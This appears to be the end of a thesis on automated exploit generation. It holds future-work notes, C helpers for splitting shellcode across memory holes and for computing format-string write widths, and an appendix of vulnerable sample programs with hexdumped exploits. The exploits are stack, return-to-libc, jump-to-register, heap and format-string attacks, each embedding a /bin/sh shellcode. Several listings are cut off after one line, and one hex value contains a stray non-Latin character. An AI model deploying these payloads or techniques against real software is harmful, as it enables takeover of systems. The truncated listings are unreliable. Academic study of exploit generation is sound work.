
To improve automated exploit generation, several directions of further work can be pursued:

• A more complete end-to-end system

– Real-world programs are usually released as binary executables without source code. To operate on binaries directly, many input sources must be handled, such as standard input, environment variables, sockets, and files. Extending the system so that it can generate exploits for more real-world applications is therefore an important piece of further work.

• Exploit generation for other operating systems

– For example, Windows is the most common operating system on personal computers, so exploit generation for Windows applications would be very useful. Fortunately, our method also applies to other operating systems; what differs is the memory layout and the protection mechanisms of each system. For example, 32-bit Windows reserves 2 GB of the address space for the kernel by default, whereas Linux reserves only 1 GB, so the address range searched for shellcode injection differs from the Linux case.

• More types of exploits

– We generated return-to-libc and jump-to-register exploits; other exploit types defeat other protections. For example, return-oriented programming bypasses W⊕X without injecting any shellcode (bypassing ASLR as well requires gadget addresses that are known, e.g. from a non-randomized module or an address leak). Shellcode design also matters. A powerful technique is to split the shellcode into several small pieces, inject them into different regions, and chain the pieces together with jumps; even when no single symbolic block in memory is large enough to hold the complete shellcode, the exploit still works.
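The split-and-chain idea in the last item, worked through as an added example (this code is not from the thesis or its tool). It models the target's memory as a flat byte array in which the exploit may write only into a few disjoint holes, standing in for the symbolic blocks the text mentions, and links the fragments with the x86 relative-jump encodings EB rel8 and E9 rel32. The hole offsets and sizes in demo() are constructed; the 28-byte payload is the shellcode of Listing 10 in Appendix A.

```c
#include <stdint.h>
#include <string.h>

/* A writable hole in the target's memory image: [off, off + len). */
struct region { size_t off; size_t len; };

/* Jump encoding for the fragment that fills `cur` and continues at next_off:
   2 (jmp rel8, EB xx) or 5 (jmp rel32, E9 xx xx xx xx), or 0 if the hole
   cannot hold even one payload byte plus the jmp. */
static size_t pick_jmp_size(const struct region *cur, size_t next_off)
{
    /* rel8 counts from the instruction after the 2-byte jmp = the hole's end */
    long d = (long)next_off - (long)(cur->off + cur->len);
    if (cur->len > 2 && d >= -128 && d <= 127)
        return 2;
    return cur->len > 5 ? 5 : 0;
}

/* Writes a jsz-byte jmp at p (which lives at address `from`) landing on `to`. */
static void emit_jmp(uint8_t *p, size_t from, size_t to, size_t jsz)
{
    uint32_t rel = (uint32_t)((long)to - (long)(from + jsz)); /* from next insn */
    p[0] = jsz == 2 ? 0xEB : 0xE9;
    for (size_t i = 1; i < jsz; i++)              /* little-endian immediate */
        p[i] = (uint8_t)(rel >> (8 * (i - 1)));
}

/* Decodes the jmp at p (address `from`) and returns where it lands. */
static size_t jmp_target(const uint8_t *p, size_t from)
{
    if (p[0] == 0xEB)
        return (size_t)((long)from + 2 + (int8_t)p[1]);
    uint32_t u = p[1] | p[2] << 8 | p[3] << 16 | (uint32_t)p[4] << 24;
    return (size_t)((long)from + 5 + (int32_t)u);
}

/* Places sc[0..sclen) into the holes in order, ending every fragment but the
   last with a jmp to the next hole, so control entering r[0].off runs the
   whole shellcode. Returns the number of holes used, or -1 if it cannot fit. */
int chain_shellcode(uint8_t *image, const struct region *r, int nr,
                    const uint8_t *sc, size_t sclen)
{
    size_t done = 0;
    for (int i = 0; i < nr; i++) {
        size_t remaining = sclen - done;
        if (remaining <= r[i].len) {            /* final fragment, no jmp */
            memcpy(image + r[i].off, sc + done, remaining);
            return i + 1;
        }
        if (i + 1 == nr)
            return -1;                          /* out of holes */
        size_t jsz = pick_jmp_size(&r[i], r[i + 1].off);
        if (jsz == 0)
            return -1;                          /* hole too small for glue */
        size_t chunk = r[i].len - jsz;
        memcpy(image + r[i].off, sc + done, chunk);
        emit_jmp(image + r[i].off + chunk, r[i].off + chunk, r[i + 1].off, jsz);
        done += chunk;
    }
    return -1;
}

/* Walks the chain fragment by fragment: copies each fragment's payload bytes
   to out and checks that its trailing jmp lands on the next hole. Returns the
   payload length recovered, or -1 on a broken link. */
long reassemble(const uint8_t *image, const struct region *r, int nused,
                size_t sclen, uint8_t *out)
{
    size_t got = 0;
    for (int i = 0; i < nused; i++) {
        if (i + 1 == nused) {
            memcpy(out + got, image + r[i].off, sclen - got);
            return (long)sclen;
        }
        size_t jsz = pick_jmp_size(&r[i], r[i + 1].off);
        if (jsz == 0)
            return -1;
        size_t chunk = r[i].len - jsz, from = r[i].off + chunk;
        if (jmp_target(image + from, from) != r[i + 1].off)
            return -1;
        memcpy(out + got, image + r[i].off, chunk);
        got += chunk;
    }
    return -1;
}

/* Constructed scenario: the 28-byte shellcode of Listing 10 spread over three
   holes of 12, 10 and 40 bytes in a 4 KiB image. No hole holds it whole, and
   the second hole is beyond rel8 range of the third. Returns 1 on success. */
int demo(void)
{
    static const uint8_t sc[28] = {
        0x31, 0xc0, 0x89, 0xc2, 0x50, 0x68, 0x6e, 0x2f, 0x73, 0x68,
        0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3, 0x89, 0xc1, 0xb0,
        0x0b, 0x52, 0x51, 0x53, 0x89, 0xe1, 0xcd, 0x80 };
    const struct region holes[3] = { {0x100, 12}, {0x140, 10}, {0x800, 40} };
    uint8_t image[0x1000], back[sizeof sc];

    memset(image, 0xcc, sizeof image);          /* int3 everywhere else */
    int used = chain_shellcode(image, holes, 3, sc, sizeof sc);
    if (used != 3 || reassemble(image, holes, used, sizeof sc, back) != 28)
        return 0;
    return memcmp(back, sc, sizeof sc) == 0;
}
```

chain_shellcode takes the 2-byte jump whenever the next hole is within rel8 range and the 5-byte one otherwise, so each intermediate hole gives up at most five bytes to glue. Holes are consumed in the order given, so one too small to hold a payload byte plus its jump makes placement fail rather than being skipped. On a real target the fragments must of course land in memory that is executable, which is exactly the restriction the W⊕X remark above refers to.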


Appendix A

Sample Code and Exploits

A.1 Shellcode

Listing 10: The shellcode used (28 bytes; it calls execve("//bin/sh", {"//bin/sh", NULL}, NULL) through int 0x80 on 32-bit Linux)

00000000  31 c0 89 c2 50 68 6e 2f 73 68 68 2f 2f 62 69 89  |1...Phn/shh//bi.|
00000010  e3 89 c1 b0 0b 52 51 53 89 e1 cd 80              |.....RQS....|
0000001c

A.2 Stack Buffer Overflow Vulnerability

Listing 11: Sample code with a stack buffer overflow vulnerability

#include <stdio.h>
#include <string.h>

void a(char *argv)
{
    char buf[50];

    strcpy(buf, argv);
}

int main(int argc, char **argv)
{
    if (argc > 1)
        a(argv[1]);

    return 0;
}

Listing 12: A return-to-stack exploit for Listing 11

00000000  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  |................|
00000010  90 90 90 90 90 90 31 c0 89 c2 50 68 6e 2f 73 68  |......1...Phn/sh|
00000020  68 2f 2f 62 69 89 e3 89 c1 b0 0b 52 51 53 89 e1  |h//bi......RQS..|
00000030  cd 80 8f fa ff bf 9a fa ff bf 01 01 01 01 01 01  |................|
00000040  01 01 01 01 01 01 01 01 02 01 01 01 01 01 01 01  |................|
00000050  01 01 01 01 01 01 01 01 01 01 01 02 01 01 01 01  |................|
00000060  01 01 01 02                                      |....|
00000064

Listing 13: A return-to-libc exploit for Listing 11

00000000  88 02 01 01 02 01 01 04 01 01 01 01 01 01 01 01  |................|
00000010  01 01 01 01 01 01 01 01 01 01 02 01 01 01 01 01  |................|
00000020  01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  |................|
00000030  01 01 8f fa ff bf a0 b7 eb b7 01 01 01 01 df fa  |................|
00000040  ff bf 20 20 20 20 20 20 20 20 20 20 20 20 20 20  |..              |
00000050  20 20 20 20 20 20 20 20 20 20 20 20 20 2f 62 69  |             /bi|
00000060  6e 2f 73 68                                      |n/sh|
00000064

Listing 14: A jump-to-register exploit for Listing 11

00000000  31 c0 89 c2 50 68 6e 2f 73 68 68 2f 2f 62 69 89  |1...Phn/shh//bi.|
00000010  e3 89 c1 b0 0b 52 51 53 89 e1 cd 80 02 02 01 01  |.....RQS........|
00000020  01 01 02 01 01 02 01 01 01 01 01 01 01 01 01 01  |................|
00000030  01 01 8f fa ff bf 9f 83 04 08 01 01 01 01 02 01  |................|
00000040  01 01 01 01 01 01 01 01 01 02 01 01 01 01 01 01  |................|
00000050  01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  |................|
00000060

A.3 Heap Buffer Overflow Vulnerability

Listing 15: Sample code with a heap buffer overflow vulnerability

#include <stdlib.h>
#include <string.h>

void a(char *argv)
{
    char *first, *second;

    first = malloc(80);
    second = malloc(80);
    strcpy(first, argv);
    free(first);
    free(second);
}

int main(int argc, char **argv)
{
    if (argc > 1)
        a(argv[1]);

    return (0);
}

Listing 16: An exploit for Listing 15

00000000  88 01 01 02 01 01 01 01 01 01 01 01 01 01 01 01  |................|
00000010  01 01 04 01 01 01 01 02 01 01 01 01 01 01 02 01  |................|
00000020  01 01 01 01 01 01 02 01 01 01 01 eb 0a 90 90 90  |................|
00000030  90 90 90 90 90 90 90 31 c0 89 c2 50 68 6e 2f 73  |.......1...Phn/s|
00000040  68 68 2f 2f 62 69 89 e3 89 c1 b0 0b 52 51 53 89  |hh//bi......RQS.|
00000050  e1 cd 80 02 fc ff ff ff a4 fa ff bf 92 fc ff bf  |................|
00000060  01 01 01 40                                      |...@|
00000064

A.4 Off-by-one Buffer Overflow Vulnerability

Listing 17: Sample code with an off-by-one buffer overflow vulnerability

#include <stdio.h>

Listing 18: An exploit for Listing 17

00000000  8f fa ff bf ad fa ff bf 90 90 90 90 90 90 90 90  |................|

A.5 Uninitialized Variable Vulnerability

Listing 19: Sample code with an uninitialized variable vulnerability

#include <stdio.h>

Listing 20: An exploit for Listing 19

00000000  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  |................|

A.6 Format String Vulnerability

Listing 21: Sample code with a format string vulnerability

#include <stdio.h>

void a(char *argv)
{
    char fmt[100];

    snprintf(fmt, sizeof(fmt), argv);
    printf("%s", fmt);
}

int main(int argc, char **argv)
{
    if (argc > 1)
        a(argv[1]);

    return 0;
}

Listing 22: An exploit for Listing 21

00000000  14 96 04 08 15 96 04 08 16 96 04 08 17 96 04 08  |................|
00000010  25 34 34 36 78 25 37 24 6e 25 33 30 30 78 25 38  |%446x%7$n%300x%8|
00000020  24 6e 25 32 36 31 78 25 39 24 6e 25 31 39 32 78  |$n%261x%9$n%192x|
00000030  25 31 30 24 6e 90 90 90 90 90 90 90 90 90 90 90  |%10$n...........|
00000040  90 90 90 90 90 90 90 90 31 c0 89 c2 50 68 6e 2f  |........1...Phn/|
00000050  73 68 68 2f 2f 62 69 89 e3 89 c1 b0 0b 52 51 53  |shh//bi......RQS|
00000060  89 e1 cd 80                                      |....|
00000064
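Listing 22 writes a 4-byte value one byte at a time: four target addresses lead the buffer, and four %n conversions (direct parameter access, arguments 7 to 10) each store the running character count, which the preceding %x field widths steer to the right value modulo 256. The following added example, not part of the thesis, derives such widths from a target value and checks them against the listing's own. The only data taken from the page are the widths 446, 300, 261 and 192, the 16-byte address prefix and the argument positions; the MIN_WIDTH rule is an assumption of this example, since the thesis does not state how its generator picked widths.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Widths below this are bumped by 256 so the %x conversion's own digits (up
   to 8 for a 32-bit value) can never exceed the field width and throw the
   count off. Assumption of this example, not a rule taken from the thesis. */
#define MIN_WIDTH 8

/* Little-endian byte i of v. */
static unsigned byte_of(uint32_t v, int i) { return (v >> (8 * i)) & 0xff; }

/* Builds the "%<w>x%<k>$n" chain that writes the four bytes of `value` to
   addr, addr+1, addr+2, addr+3, assuming those four pointers sit at format
   arguments first_arg..first_arg+3 and `prefix` characters (the pointers
   themselves) precede the first conversion. Fills widths[] and out; returns
   the format length, or -1 if out is too small. */
int build_writes(uint32_t value, int first_arg, unsigned prefix,
                 unsigned widths[4], char *out, size_t outsz)
{
    unsigned printed = prefix;
    size_t used = 0;
    for (int i = 0; i < 4; i++) {
        unsigned pad = (byte_of(value, i) - printed) & 0xff;  /* mod 256 */
        if (pad < MIN_WIDTH)
            pad += 256;
        int n = snprintf(out + used, outsz - used, "%%%ux%%%d$n",
                         pad, first_arg + i);
        if (n < 0 || (size_t)n >= outsz - used)
            return -1;
        widths[i] = pad;
        used += (size_t)n;
        printed += pad;
    }
    return (int)used;
}

/* Computes the 32-bit value such a chain leaves at addr. Each %n stores a
   4-byte running count; the four stores overlap by three bytes, so the byte
   that survives at addr+i is the low byte of the i-th count (the high bytes
   spill into addr+4..addr+6, which is why the counts only ever grow). */
uint32_t simulate_writes(const unsigned widths[4], unsigned prefix)
{
    unsigned printed = prefix;
    uint32_t v = 0;
    for (int i = 0; i < 4; i++) {
        printed += widths[i];
        v |= (uint32_t)(printed & 0xff) << (8 * i);
    }
    return v;
}

/* Listing 22 as data: four 4-byte addresses, then the widths it uses. */
const unsigned listing22_prefix = 16;
const unsigned listing22_widths[4] = { 446, 300, 261, 192 };

/* Returns 1 if the widths generated here store the same value as Listing 22's
   and come out as the expected minimal format string. */
int demo(void)
{
    char fmt[128];
    unsigned w[4];
    uint32_t target = simulate_writes(listing22_widths, listing22_prefix);

    if (build_writes(target, 7, listing22_prefix, w, fmt, sizeof fmt) < 0)
        return 0;
    printf("target 0x%08x: %s\n", target, fmt);
    return simulate_writes(w, listing22_prefix) == target
        && strcmp(fmt, "%190x%7$n%44x%8$n%261x%9$n%192x%10$n") == 0;
}
```

Running demo() recovers 0xbffffacе as the value Listing 22 stores (16 + 446 = 462 = 0x1ce gives the low byte 0xce, 462 + 300 = 762 = 0x2fa the next, and so on) and regenerates it with the minimal widths 190, 44, 261 and 192. The listing's larger 446 and 300 produce the same bytes because only the count modulo 256 reaches each target byte, so a generated solution need not be minimal; 261 rather than 5 is what the MIN_WIDTH rule yields here.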
